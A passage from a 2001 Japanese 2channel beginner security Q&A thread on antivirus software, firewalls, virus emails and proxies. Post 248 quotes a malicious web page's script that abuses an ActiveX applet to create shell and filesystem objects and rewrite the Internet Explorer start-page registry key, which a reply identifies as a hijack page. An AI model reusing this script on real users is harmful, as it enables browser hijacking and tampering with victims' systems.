しようと思っていますが、これだけではダメですか?
連続接続時間は、5〜6時間ぐらいなのですが。
よろしくお願いします。

111 :名無しさん@お腹いっぱい。:01/12/18 21:46
>>110
ダメとは何が?
使い方を間違ってなければ問題ないぞ

112 :110:01/12/18 21:51
ごめんなさい。
セキュリティ的に、甘いとか十分かを教えて頂きたかったのです。
これも入れた方がいいよ・・・というものがありましたら
アドバイスお願いします。

113 :名無しさん@お腹いっぱい。:01/12/18 21:55
>>112
ウイルス対策ソフトやファイヤーウォールソフトを2つ以上同時に
起動させるとまずいよ

114 :名無しさん@お腹いっぱい。:01/12/18 21:59
>>110
ノートンにしたら?
いや、なんとなくですが…

115 :110:01/12/18 22:06
>113
そうなんですか?
この組み合わせは大丈夫だと見たのですが・・・。

>114
ノートンのInternet Security2002は不具合が多いと聞いたので
アンチウイルスのみにして、ファイアーウォールをZoneにしようと
思ったんです。

116 :名無しさん@お腹いっぱい。:01/12/18 22:10
>>115
いや意味を取り違えてもらうと困るんだが
ウイルス対策ソフトを同時に2つ起動したり
ってことよ

ノートンに不具合なんて別にないけどね

117 :名無しさん@お腹いっぱい。:01/12/18 22:12
最近98からWin2kに換えました。
で、ネットワークでのフォルダ共有についてなんですが、
あるフォルダをアクセス許可で「Everyone」とすると、
当然、誰でも入ってこれますよね。
そこにパスワードをかけたいんですが、どうすればいいでしょうか?
つまり、パスワードを知っている人なら
誰でも入れるようにしたいんです。
よろしくお願いします。

118 :110:01/12/18 22:17
私、意味を取り違えてたのかも知れません。
一緒に常駐させてはいけないのですか?

119 :名無しさん@お腹いっぱい。:01/12/18 22:18
>>117
マルチは逝ってよし

120 :名無しさん@お腹いっぱい。:01/12/18 22:22
>>118
ん? まだ言ってることがわからないかい?
常駐とは何を常駐させるつもりだい?

121 :名無しさん@お腹いっぱい。:01/12/18 22:33
>>110
ノートンに不具合なんかないですが。
いや、今まではの話ですけど…

122 :名無しさん@お腹いっぱい。:01/12/18 22:38
NIS2002は不具合があるんじゃなくて初心者には使い辛い。

123 :87=103:01/12/18 22:47
>>103
>>107
なるほど。
いや、大変勉強になりました。ゾーンアラーム使ってみる事にします。
ありがとうございました。

124 :123:01/12/18 22:49
間違えた・・・
87=93でした(鬱

125 :110:01/12/18 22:52
たびたびすみません。
不具合なんて言い方よくなかったですね・・・。

今ノートンの2001の体験版を試用しています。(Win98)
最初、パソコンを立ち上げたら、ノートンの画面が出て、
「試用」を両方クリックします。
すると、地球とパソコンの絵が下に出ます。
これが>>115さんのおっしゃる起動ですか?

126 :名無しさん@お腹いっぱい。:01/12/18 22:57
>>125
常駐の意味分ってないみたいだね。
スタートアップとかMSConfigとか分る?

127 :名無しさん@お腹いっぱい。:01/12/18 23:02
>>125
常に動いているソフト(プログラム)を常駐ソフトっていうの。
アンチウイルス関係の多くがPC起動と同時に働くので、これも
設定で切らない限り常駐ソフトってわけ。

で、数種類のアンチウイルスを持つ、又はインストールしても
問題ないが、同時に動かすな!ってこと。
もっと簡単に言えばアンチウイルスは一つ、FWは一つにしろって
こと。

128 :名無しさん@お腹いっぱい。:01/12/18 23:06
>>125
いや、アンチウィルスソフトを2つとか起動させとくとマズイって意味でしょ。

> ノートンのInternet Security2002は不具合が多いと聞いたので
> アンチウイルスのみにして、ファイアーウォールをZoneにしようと
> 思ったんです。
これでOKです。何の問題もないと思われ。

129 :110:01/12/18 23:11
ZoneがFW、ノートンAntiVirus がアンチウイルスと認識していたんです。

>>128さんに訳してもらちゃった・・・。OKなんですよね!?よかった。
日本語から勉強してきます。
ありがとうございました。

130 :名無しさん@お腹いっぱい。:01/12/18 23:15
それでWVをインストールするときに
ノートン先生をアンインストールさせられたのか・・

131 :初心者:01/12/18 23:19
初めてメールをもらう方からのメールを見る時に、
添付ファイルがついていて、怖いので添付ファイルの内容を見たくないのですが、
どうやって見たらメールの文章だけを見れるのでしょうか?^^;
よかったら教えてください^^;

132 :名無しさん@お腹いっぱい。:01/12/18 23:20
>>131
添付ファイルを開きたくない旨を伝える。

133 :初心者:01/12/18 23:22
>>132さんへ

レスありがとうございます。
それも相手に失礼かなと思って、設定を変えてどうにか見れないかなと思うのですが・・・。
そういうのは不可能なんでしょうか?

134 :名無しさん@お腹いっぱい。:01/12/18 23:25
>>133
ウイルス対策ソフトは入ってるんだろうね?

135 :初心者:01/12/18 23:28
>>134さん

それが入ってないので・・・・怖いんです。
添付ファイルを見ないとやっぱりメール見れないですか?
Lycosのメールアドレスなんですが・・・。

136 :名無しさん@お腹いっぱい。:01/12/18 23:31
>>135
は?
だったら今日は回線切って明日朝いちでソフト買って来い
ウイルスをばら撒かれるとこっちまで迷惑だ

137 :名無しさん@お腹いっぱい。:01/12/18 23:32
すみません。質問なのですが、
htmlベースとJavaベースのセキュリティの違いはどのような
ものがあるかご存知の方いますか?個人認証において
通信間におけるセキュリティの違いを教えていただきたい
と思います。
ご存知の方、よろしくお願い致します。

138 :初心者:01/12/18 23:46
>>136

 あ、はい、すいません^^;
 ばらまかないように気を付けます・・・・

139 :>>135:01/12/18 23:48
>添付ファイルを見ないとやっぱりメール見れないですか?
ホントに初心者さんのようなので、難しい説明は省きますが、
「見れない」と思っていいでしょう。
>>136さんのおっしゃる通りアンチウィルスソフトを買ってウィルスチェックしてから
メールを見ることをお勧めします。

140 :名無しさん@お腹いっぱい。 :01/12/19 00:09
どうしても分からないことがあるので教えてください。
今はやりのW32.Badtransウイルスに感染している
PCから携帯電話にメ−ルが送られた場合
携帯電話もウイルス感染する可能性ってあるのですか?

141 :名無しさん@お腹いっぱい。:01/12/19 00:10
>>140
ない
携帯じゃ実行できないからね

142 : ◆QwRPN9a6 :01/12/19 00:48
携帯電話のTrojanならあります

143 :名無しさん@お腹いっぱい。:01/12/19 00:54
>78
ありがとうございます

144 :名無しさん@お腹いっぱい。:01/12/19 00:56
ちょいtest

145 :sage:01/12/19 04:23
172.31.0.9
172.19.88.198
192.168.100.94
192.168.14.3
10.16.67.67
10.2.5.1

からパケットが来る
何故?

146 :名無しさん@お腹いっぱい。:01/12/19 04:23
>>145
アタックしてるから

147 :名無しさん@お腹いっぱい。:01/12/19 04:52
>>144
キャリアがCATVとかじゃないの?
違ったらパケットのIPアドレス書き換えられてるとか。

148 : :01/12/19 15:53
激しく既出かもしれませんが、お教えください。

相手の携帯アドレス(ドコモ)が分かれば、相手に送り・送られた
メールを入手できるのでしょうか?友達が、援助系サイトでアドレス
を晒されて、俺が相談に乗っている時のメールのやりとりを晒したやつが
知っているようなのですが・・・。(さっき脅迫メールが来て、内容が
話していた事と大体一致するのです)
どうか、ご教授願います。

149 :名無しさん@お腹いっぱい。:01/12/19 15:57
>>148
送り送られたメールってメールの内容のこと?
それは本人と送った人しか分からないよ

150 :148:01/12/19 16:07
そうです。ドコモのセキュリティは信用してよろしいのですか?

151 :名無しさん@お腹いっぱい。:01/12/19 16:11
>>150
大丈夫だと思われ

152 :148:01/12/19 16:13
有り難うございます!!

153 :名無しさん@お腹いっぱい。:01/12/19 17:54
すいません。質問です。先日www.top.or.jp/godhand/a2.htmlというアドレスが
武道版のスレッドにいたずら?で出されておりまして、クリック
してしまったら、とても怖い思いをしてしまいました。いまのところ
なんともないのですが、いったいなんだったのでしょう?
あと、2CHで紹介されているエクスプローラーの修正プログラムは
インストールしたほうがいいんですか?????わからん

154 :名無しさん@お腹いっぱい。:01/12/19 17:58
>>153
■godhandウィルスとかいうの踏んじゃった■
http://pc.2ch.net/test/read.cgi/sec/1008511723/l50

http://pc.2ch.net/test/read.cgi/sec/1008081334/l50

修正プログラムはこれとは関係なく導入しろ。

155 :名無しさん@お腹いっぱい。:01/12/19 18:06
ありがとうございました。要約するとただのいたずらでなんとも
ないってことですよね?ね?ホッ
修正プログラムはとりあえずやってみます。できるかなあ(←初心者)

156 : :01/12/19 18:15
hamster.doc.pifなる添付ファイルとテキストの2通がついた
メールがきました。ウィルスですか?

先日ダウンロードしたノートン先生にはひっかからなかったのですが・・
好奇心でテキストだけ開きました。
アドバイスお願いします

157 :名無しさん@お腹いっぱい。:01/12/19 18:22
>>156
ウイルスです
ノートン先生は買ってきなさい

158 :  :01/12/19 18:30
>>157
ありがとうございます。
買ったものとダウンロードしたものとでは
どのぐらい違うのでしょうか?よろしくお願いいたします。

159 :名無しさん@お腹いっぱい。:01/12/19 18:53
>>158
ダウンロード販売のものか?
だったら大丈夫だけどフリーの奴はサポートしてくれないぞ
ウイルス定義も更新できないし

160 :名無しさん@お腹いっぱい。:01/12/19 19:10
便乗させて下さい。
NIS2001体験版をダウンロードしようと思ってたのですが、
ウィルス定義を更新できないのでしょうか。

161 :名無しさん@お腹いっぱい。:01/12/19 19:11
>>160
体験版ですべてまかなえるならシマンテックは倒産しますよ

162 :禿同:01/12/19 19:57
ノートンよりウイルスバスターでは?
とりあえずよんどけば安心。
http://www.puchiwara.com/hacking/

163 :名無しさん@お腹いっぱい。:01/12/19 20:18
>>162
俺はNorton派だな

164 :名無しさん@お腹いっぱい。:01/12/19 21:41
>>162
サイトでは1500円だけど、通販では1600円だったね。
でもためになりそう。

165 :名無しさん@お腹いっぱい。:01/12/19 21:41
IE6&5.5は危険です。とこの板の上にかいてますが。
5.0はどうなんでしょうか?

166 :名無しさん@お腹いっぱい。:01/12/19 21:43
>>165
5.0はサポート対象外だよ
5.5にしな

167 :名無しさん@お腹いっぱい。:01/12/19 22:17
Eudora Ver4.3Jってどう?このヴァージョンは無料なんでしょ。

168 :名無しさん@お腹いっぱい。:01/12/19 22:19
>>167
どう? って何が?

169 :質問:01/12/20 05:39
Mac使ってるんですが、ハムスターとかいウィルスを送られたみたい
なんですが、やばいんでしょうか?winだけに対してのものなのでしょうか、
このウィルスは?と、言うかウィルスかどうかもわからないんですが。

170 :165:01/12/20 07:52
>>166

どうもありがとう御座いました。

171 : :01/12/20 08:58
>>169
サブジェクトがRe:だけ、サイズが41K前後ならまずBadTransという
ウイルス。Macは感染しないが、捨てちまうが吉。

172 :名無しさん@お腹いっぱい。:01/12/20 09:06
ネットにつなげると、C.WINDOWS.EXPLORER.EXEがやってきます。
今のところ毎回ノートン先生でブロックしていますが、こいつは本物の
WINDOWS.EXPLORERでしょうか?それともトロイでしょうか?
ちなみにIE5.5を利用していますが、修正ずみで、バージョン情報は
SP2;Q312461;Q313675になっています。
誰か教えてください。

173 :名無しさん@お腹いっぱい。:01/12/20 10:11
以下の環境ですが

       desk 2000       note 98
       ZA有り        ZA無し
adslーーーーーnic 1
ICSで接続共有
       nic 2ーーーーーーーーーnic 3
       IE6     ↑   IE6
          ↑
              LAN

ZAを外すとノートからインターネットへアクセスできるの
ですが、入れるとブロックされてしまいます。
ファイルのやりとりはZA有りでもできます。
設定をいろいろいじってみましたが、繋がりません。
ご存じの方 設定方法をお教え下さい。

174 :名無しさん@お腹いっぱい。:01/12/20 10:14
>173
ZA有り 無しは インストールしているかいないかです。
よろしくおねがいします。

175 :名無しさん@お腹いっぱい。:01/12/20 11:42
商品説明欄に臆面も無く「win Me インストール済みです!」
「これはお買い得です!」等の謳い文句を書きなぐるタワケ出品者が
晒しあげを喰らって逆上!本人降臨して事態は際限無くヒートアップ!
しかしまぁ・・・OS入れてヤフオクで売るなよ・・・って
呆れるほどのヴァカが晒されてます。失笑注意!(w
http://mentai.2ch.net/test/read.cgi/doll/1008771798/l50

176 :貴族:01/12/20 11:50
ウイルス(種類問わず)に感染した時の症状などを
語っているスレを教えて。

177 :***:01/12/20 15:41


http://ams.milkcafe.to/Asunaro/Program/Burakura/index.html

178 :ちょこれいと:01/12/20 15:57
ウイルス情報教えてください。
画面が真っ黒になって、真ん中に
EnterCURRENTpassword:
というメッセージが出てきます。
再起動してもこの画面になります。
パスワードが分からず、とりあえずEnterキーを押すと
3回目で上記メッセージのあとに顔らしきものが出てきて、
その表情は笑っています。
で、そのまま動かず。です。
これってウイルス?
知っている方、教えてください。

179 :名無しさん@お腹いっぱい。:01/12/20 16:08
ノートンのインターネットセキュリティをインストールしたんですけど

「アドレス 202.210.151.123 からの不正侵入の試みを規則 Senna Spy トロイの木馬のデフォルト遮断 によって検出しました。
以降のアクセスを 30 分間遮断しました。」

って画面が出たんですけど(同じ相手で2回)こういう場合はどう対処すればいいんですか?
まるっきり初心者でわかりません。
どなたか教えて下さい。

180 :名無しさん@お腹いっぱい。:01/12/20 16:18
>>179
気にしなくていいよ。

181 :名無しさん@お腹いっぱい。:01/12/20 16:31
>>180
返答ありがとう御座います。
でも、ノートンは最近入れたんですけど
それ以前は侵入されてたんですかね?

182 :名無しさん@お腹いっぱい。:01/12/20 16:35
この質問、いつまでたっても無くならないね…
SSTPっていうプロトコルがあってね。
デスクトップマスコットにメッセージを送ってるんですよ。
それだけなんです。

それ、特定のwebpageを見に行ったときに起こるでしょ?

183 :名無しさん@お腹いっぱい。:01/12/20 16:43
どなたかSOCKSの使い方を教えて下さい。
無料で使えるものなんですか?

184 :名無しさん@お腹いっぱい。:01/12/20 16:51
>>183
UNIXで個人使用なら無料だよ。Win版は有料。
機能が豊富なので使い方はgoogleで探しなさい。

185 :183:01/12/20 16:56
>>184
どうもありがとうございます!
SOCKSのサイトに行っても英語で読めないし、MXのスレでも串スレでも
放置だし、本当に謎でした。
最後に一つだけ教えて下さい!
SOCKSを使うには、それなりのスキルは必要ですか?

186 :名無しさん@お腹いっぱい。:01/12/20 17:11
>>185
元がNEC開発なのでSOCKSのサイトは日本語表示できるよ。読めなかったけど。
それなりの判断が難しいけど、WEBでそれなりに情報を検索できて、
コンソールで設定するのにそれなりに慣れていれば。
http://www.permeo.com/japanese/japanese.htm
http://www.tac.tsukuba.ac.jp/~hiromi/socks5.html

187 :183:01/12/20 17:29
>>186
あー、わざわざありがとうございます!
でも、すぐに使えるようなものではないんですね・・・。
よーし!教えていただいたサイトを参考に、
ちょっと勉強してみます。

188 :名無しさん@お腹いっぱい。:01/12/20 19:09
PCのCドライブの中に「fix_nimuda」っていうファイルが
あるんですけど・・・・・・・;
アイコンを選択したら「fix_nimuda.exe」って出て
更新日時が今年の9月22日、サイズが88KBって
なってるんです・・・・・・・なんかヤバイ匂いぷんぷん
なんですが、削除しようとすると
「fix_nimuda.exeはプログラムです。
削除すると編集できなくなるドキュメントがある可能性があります」
って出るんです(泣)。これってなに?
オンラインでウイルス検索しても出てきたことなかったのに;
ちなみにIE5から、パッチ当てたりの作業は
9月の下旬か10月の上旬あたりにやった記憶があります。

189 :名無しさん@お腹いっぱい。:01/12/20 19:17
他のとこにも書いたのですが、初心者なので教えてください。
ニュー速板で間違って「ついにビンラディン捕獲!!・・・」
ってやつ踏んじゃったんですけれど、これって話題になってるセキュリティホールのこといってるんですか?
具体的にどうやばいんでしょうか?踏んだ後にセキュリティ関係のアップデートしても意味ないのですか?
詳しいかたお願いします。
電源切ってれば勝手に外からコントロールされることもないのかな?

190 :名無しさん@お腹いっぱい。:01/12/20 19:24
>>188
3ヵ月後には
「FixBadtr.exeっていうファイルがあるんですけど」
と言い出すのに500ウォン

191 :名無しさん@お腹いっぱい。:01/12/20 19:26
Javaのセキュリティ機能としてデータを暗号化するという
話を聞いた事あるのですが、これはSSLの暗号化とは違うの
でしょうか?どなたか、Javaのセキュリティの特徴を詳しく
ご存知の方、どうか教えてください。
よろしくお願いします。

192 :名無しさん@お腹いっぱい。:01/12/20 19:31
>>189
>他のとこにも書いたのですが
マナー違反ですよ。

193 :189:01/12/20 19:34
>>192
すみません。あせってたもので・・。

194 :名無しさん@お腹いっぱい。:01/12/20 19:50
何故かマイクロソフト関連のホムペにとべないんですが...
今もIEの件でここの板に貼ってあるリンクからとべないし、
エイジオブエンパイアのデモDLしようとした時もとべないし...

195 :194:01/12/20 19:52
↑ページを表示できません、と出ます。

196 ::01/12/20 20:29
今ZAを見たら、「×から△へのルートトラフィックをブロックしました。」
と出たんですが、ルートトラフィックとは何でしょう?×と△は自分のIPでは
ありません。

197 :名無しさん@お腹いっぱい。:01/12/20 20:44
>>194
飛べないとはどういう風に飛べないの?
OSは? IEのバージョンは?
回線は混み合ってないか?

198 :194:01/12/20 22:14
>>197
ウィンドウズME・IE5,5です。
例えばここの板のウィンドウズセキュリティ情報をクリックすると、
始めに「ページを表示出来ません。」と出て、最後に「サーバーが見つからないか、DNS エラーです。」と出ます。
一応その画面に書いてあることは試したのですが結果は変わらずでした。
またエイジオブエンパイアのページは夏ごろからとべてませんから、回線以外の問題ではないかと思います。
ちなみにフレッツADSL使ってます。

199 :名無しさん@お腹いっぱい。:01/12/20 22:22
>>198
夏から一回もMSのサイトに入れないの?

200 :名無しさん@お腹いっぱい。:01/12/20 22:25
>>198
今まで一度もマイクロソフトのページには行けたことがないのかい?
それとも今日だけ?

たぶんもう少し時間を置いたらいけると思う

201 :194:01/12/20 22:25
>>199
ええ。今も試してみましたがやはり無理でした。

202 :名無しさん@お腹いっぱい。:01/12/20 22:34
>>201
MSのサイトだけ入れないの?
なんかファイヤーウォールソフト使ってる?

203 :194:01/12/20 22:46
>>202
ファイヤーウォールソフトとは何ですか?

204 :名無しさん@お腹いっぱい。:01/12/20 22:59
>>203
不正侵入等を防ぐものなんだけど
知らないっつうことは使ってないね・・・。

205 :名無しさん@お腹いっぱい。:01/12/20 23:13
トロイの木馬型に感染したのでトレンドマイクロの解決方法でやって
みたのですが駆除の確認方法がイマイチわかりません、また
ツールのログの「III.」の項目を参照してくださいと記載せれて
いますがやり方がわかりません。すいません教えてください。

206 :名無しさん@お腹いっぱい。:01/12/20 23:22
>>205
なんのトロイに感染したのかかかなきゃ何も教えられない。

207 :名無しさん@お腹いっぱい。:01/12/20 23:27
友人から「sulfnbk.exe」というウィルスが行ったと思うから削除するようにと
メールが来たので、検索したのですが随分前からあるみたいなのです。
これって削除しても良いのでしょうか?

208 :名無しさん@お腹いっぱい。:01/12/20 23:31
>>189
>他のとこにも書いたのですが
マナー違反ですよ。

209 :名無しさん@お腹いっぱい。:01/12/20 23:34
>>208
教えてやれよ。

210 :名無しさん@お腹いっぱい。:01/12/20 23:35
>>207
http://www.ipa.go.jp/security/topics/alert130530.html

211 :名無しさん@お腹いっぱい。:01/12/20 23:35
>>207
googleで検索してみて。
デマ情報らしいよ。

212 :207:01/12/20 23:46
>>210
>>211
ありがとうございます。
これから気をつけます。

213 :名無しさん@お腹いっぱい。:01/12/21 00:21
>>206

W32/BADTRANS-Bです

214 :名無しさん@お腹いっぱい。:01/12/21 00:37
NISからの警告
リモートシステムがこのPCにアクセスしようとしています
ってのがさっきから頻繁に出て怖いんですけど。

>>2で紹介されている
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
とかでチェックしても特に問題はなさそうなんですが。
このまま接続続けててもいいんでしょうか・・・?

215 :名無しさん@お腹いっぱい。:01/12/21 00:46
>>213
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3368
これのどこが分からないのだ?

216 :名無しさん@お腹いっぱい。:01/12/21 00:53
>>213
http://a500.g.akamai.net/7/1776/484/00003/inet.trendmicro.co.jp/solutionfile/3378readme.txt
ここに書いてある通りだが?

217 :名無しさん@お腹いっぱい。:01/12/23 21:16
 

218 :代理:01/12/23 21:24
重複スレ立てちゃったのでこっちをあげ

219 :名無しさん@お腹いっぱい。:01/12/23 21:37
昨日寝る前にPC電源落とそうとしたら 3人の接続者がいます
5つのFILEを開いています
シャトダウンするとこれらのFILEが消える可能性が有りますと
出ました WINMXやってました でも交換も終わり
接続者誰も いないはずなんですが TT
この手の知識無知なんですが 誰かつないできてるひとが
いるのですか?教えてください

220 :名無しさん@お腹いっぱい。:01/12/23 21:38
>>219 WinMXをやめることです。

221 :名無しさん@お腹いっぱい。:01/12/23 21:40
>>219
ファイルの移動が終わるまで待ってくりょ

222 :名無しさん@お腹いっぱい。:01/12/23 21:42
>>219
WinMXをやってる馬鹿のセキュリティなんてしらねーな
びびってなさいってこった

223 :名無しさん@お腹いっぱい。:01/12/23 21:42
やはり 問題はそこですか
IPアドレス漏れまくりで その手の方は 簡単に
こちらに 入り込んで 色々できるのですか?
ありがとうございました

224 :名無しさん@お腹いっぱい。:01/12/23 21:45
「zippsw」ってのが欲しいんですが、どこにあるとですか?

225 :名無しさん@お腹いっぱい。:01/12/23 21:52
>>224
あやしいものは自分で探してね

226 :名無しさん@お腹いっぱい。:01/12/23 21:52
>>224
http://www.google.com/search?hl=ja&q=zippsw&lr=lang_ja

227 :名無しさん@お腹いっぱい。:01/12/23 21:52
今日ウィルスらしきメールが届きました。
件名は無し、添付ファイルは「GPNILIGP.EXE」、容量32kbです。
ヘッダの一部です。
content-Type: multipart/mixed; boundary="--VEYBOLMZCX6NKXAFWD"
X-UIDL: 799887767889885F868526585F999674265F255
Status: U
----VEYBOLMZCX6NKXAFWD
Content-Type: text/plain; charset="us-ascii"
----VEYBOLMZCX6NKXAFWD
Content-Type: application/octet-stream; name="GPNILIGP.EXE"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="GPNILIGP.EXE"

ぐぐる、IPAのデータベースをファイル名で検索しましたがヒット無し、
まだファイルを開いていないせいか、オンラインスキャンでもヒット無しです。
BadTrans.Bと一緒に届いたのですが、なんのウィルスかわかりますか。

228 :名無しさん@お腹いっぱい。:01/12/23 21:54
>>227
なんでオンラインスキャンでやるの?
製品版持ってないなら買わなきゃだめだよ

229 :名無しさん@お腹いっぱい。:01/12/23 21:55
>>226
いや、検索くらいは既にやったんですが、検索結果の二件とも
入手難しいんでゲス、情けなや

230 :名無しさん@お腹いっぱい。:01/12/23 21:59
>>229 お前はまだ甘い。使わなくてよし。

231 :名無しさん@お腹いっぱい。:01/12/23 22:02
>>230
正論ですね、逝ってきます

232 :名無しさん@お腹いっぱい。:01/12/23 22:14
>>228
ちょうどマカフィーの期限が切れたため、
製品版はノートン先生を買ってきたばかりでまだ説明書は全部目を通してません。
相手先にまず感染のことを教えてあげたかったのですが、
BadTrans.Bと何かに感染しているのだけ連絡して
自分の方はまずインストールだけしてしまおうと思います。
ありがとうございました。

233 :名無しさん@お腹いっぱい。:01/12/24 01:00
>>219
WinMX は関係ない
netbios だ

234 :名無しさん@お腹いっぱい。:01/12/24 02:58
XPです。
UPnPのポートを閉じたいのですがどうやればいいのですか?
ファイアーウォールはsygateです。
UPnPの削除方法も知りたいです。

235 :マルチ逝ってよし:01/12/24 03:00
>>234

236 :名無しさん@お腹いっぱい。:01/12/24 05:31
ノートン以外でいい安置ウイルスソフトって
ウイルスバスター以外ないですか

237 :名無しさん@お腹いっぱい。:01/12/24 05:35
>>236
ないと思われ

238 :名無しさん@お腹いっぱい。:01/12/24 10:14
私は普段プロキシをつけて(?)ネットサーフィンしてます。
その方が安全だと聞いたからです。
ところが最近、普通にプロキシつけているだけだと、その前にどこのプロバから
そのプロキシに変えたかわかると言われました。
多重串にしてないと駄目だと。(多重串についてはよくわかりませんでした)
そんな事って調べてわかるのですか?
スレ違いかもしれませんが、普通の人に調べられるのか否かだけ教えて下さい。

239 :名無しさん@お腹いっぱい。:01/12/24 10:17
>>238
ネットサーフィンぐらいでプロキシは必要ないっすよ
その前に必要なのはファイヤーウォールとウイルス対策

240 :名無しさん@お腹いっぱい。:01/12/24 10:42
差出人、送信メールが空白で
CFLNGNCF.EXEとかONDPGKON.EXEという添付ファイルのメールが最近来ます。
(バッドトランスも来ますが)
このメールは差出人の特定、故意の送信なのかの区別は付きませんか?
このウイルスについて詳しく載っているところも教えて下さい。

241 :名無しさん@お腹いっぱい。:01/12/24 11:06
>>240
ヘッダを見ればある程度は分かるかもね
ウイルスについてはシマンテックのサイトで

242 :名無しさん@お腹いっぱい。:01/12/24 12:02
>>241
添付ファイル名で検索しても引っかからないので、、
ヘッダには送信元プロバイダしか載ってません、、

243 :名無しさん@お腹いっぱい。:01/12/24 12:04
>>238
そのまえに
あなたが何をしようとしていて誰に駄目だと言われたのか
小一時間語って欲しいです(w
やましいことがなければプロバイダ串で十分

244 :名無しさん@お腹いっぱい。:01/12/24 12:25
>>242
そのexeファイルがウイルスだと思う根拠は何?
ウイルスチェックしないでウイルスだと分かったの?

245 : :01/12/24 12:45
sygateを使っているのですが、Tiny Trojan Trapも併用したほうが
いいですか?

246 :名無しさん@お腹いっぱい。:01/12/24 12:56
どうみてもウイルスだと思うが。

>>240
hybrisだと思われ。シマンテクで検索するよろし。

247 :名無しさん@お腹いっぱい。:01/12/24 14:33
ここ数日流行ってるpingの嵐はなんなのでしょか。
何かの亜種?

248 ::01/12/24 15:40
ttp://www.geocities.com/ccsacla/images0012.jpg

上の(↑)リンクと関係あるみたいなのですが。
これ(↓)はどういう意味なのでしょうか?全く分かりません。


<html>

<head>
<title></title>
</head>

<body onUnload="unload()">

<iframe src="ssopn.html">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.geocities.com/fes74592/ssopn.html");
//Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
}
catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
}
init();
</script>

249 :名無しさん@お腹いっぱい。:01/12/24 20:08
>>248
 ↑
踏んだらあかん、IP抜き&強制メール送信&ブラクラ

250 :248:01/12/24 21:13
>>249
どうもです。
ちなみにパソコンがフリーズしましたので、電源を切りました。

251 :名無しさん@お腹いっぱい。:01/12/24 23:29
初心者スレのPart4,5を読ませていただいたのですが、
分からなかったので、教えていただきたいのですが。。
MAC用のファイアウォールソフトは、どれがいいのでしょうか?
私は、ノートンしかしらないのです。。
BlackIceやZoneは、winしかないみたいですし。。
フリーウェアもあるのでしょうか。。
お願い申し上げます。

252 :名無しさん:01/12/24 23:34
>>251
ここにあるよ。
http://www.act2.co.jp/x_act2main/X_PRD/x_intego/NetBarrier/product/
これは”ネットバリア”というソフト。

253 :251:01/12/24 23:40
>252さん
ありががとうございます。
スペックを言い忘れていたのに、大変、ありがとうございました。
早速、見て調べてみます。
ちなみに、私のMACはヘボですが、一応お伝えしておきます。
iMAC G3 233 OS8.5。
いわゆる、初代iMACのバージョン変えのやつです。

254 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/24 23:47
なんか来たよぅ!
今OEでメール受信したら、送信者が確か”コ^"で、
件名が”RE:(文字化け)”、添付ファイルありの
アヤシイもんが来た!当方IE6でプレビューも切って
あったので速攻削除しましたが、なんだったんだろ〜?
いや、初めてこんなアヤシイのが届いたんでちょっと
ドキドキしたんですけど、プロパティ見ても良かったのかなぁ?
こんな日にそんなアヤシイもんが届くなんて・・・。
たぶんウィルスでしょ?(ちょっと嬉しい)

255 :名無しさん:01/12/24 23:55
>>253
…それ、私も持ってます。
iMac(G3 233MHz) Rev.B Mac OS 9.1。
ちなみに私はノートンですが、別段不都合を感じたことはないですね。
もっともそれはADSLを導入する前だったのですが。

256 :251:01/12/24 23:59
>255さん
同じPCなんですね。
ノートンでも大丈夫なんですね。
もっとも、私は、OS、ヘボヘボですが。。
私も、ADSLにしたのをきっかけに、FW導入を考えています。
やっぱり、OSはVersionUpしないとだめなのでしょうね。。

257 :名無しさん:01/12/25 00:04
>>256
私も当初はMac OS Xを導入するつもりだったのですが、旧iBookを
新品で買ってしまいまして、そちらに導入してしまいました。
とりあえず9.Xの最終Ver.(9.2.2)にはしていません。

258 :名無しさん@お腹いっぱい。:01/12/25 00:05
>>256
とりあえず8.6にしたほうがいいんでないかい?
無料でできるし

259 :名無しさん@お腹いっぱい。:01/12/25 00:06
>>254
感染しちゃってるかもな
その書き方だと

260 :251:01/12/25 00:09
>257さん
やっぱり、少しでもOSバージョンアップするようにしてみます。
ありがとうございました。
ところで、MACでも使用できるFWで、
ZoneAlarmのようなフリーウェアはあるでしょうか?

261 :名無しさん@お腹いっぱい。:01/12/25 00:11
>>260
さんざん探したがなかったような記憶あり

262 :251:01/12/25 00:12
>258さん
そうしてみます。
ありがとうございましたです。

263 :251:01/12/25 00:15
>261さん
やっぱり、難しいのですね。。
私もまた探してみますです。
もし分かったら、こちらのどこかでアップさせていただきます。
私ごときが見つけられるかどうか分からないですけど。。
でも、ありがとうございました。

264 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/25 00:33
>>259
そんな気もします。
自分、VB2002体験板(後残り7日)入れてますが、
年が明けたらいいかげん製品を買おうかと
思っとります。

265 :名無しさん@お腹いっぱい。:01/12/25 00:36
>>264
感染して自分が加害者になることをしらないのか?
それで訴訟が起こされたこともあるんだが

266 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/25 00:43
>>265
オス。
ですから、製品版を購入すると言っております。
すいません。

267 :名無しさん@お腹いっぱい。:01/12/25 08:33
【ウィルス】Xmasウィルスに注意して
http://choco.2ch.net/test/read.cgi/news7/1009233792/l50

(News速報板より)

268 ::01/12/25 09:23
>>267
マルチかよっ!

269 :名無しさん@お腹いっぱい。:01/12/25 18:11
>>268
三村かよっ!

270 :名無しさん@お腹いっぱい。:01/12/25 19:44
すいません。ここには今、始めて来た超初心者です。質問させてください。

あるネット通販店で、セキュリティにSSLを使用しているという所を利用したのですが、
カード情報送信フォームで、ネスケ4.7では「暗号化されていません」と出るんです。

その店に問い合わせた所、「うちはSLLを使用しているので安全」という返事をもらったのですが
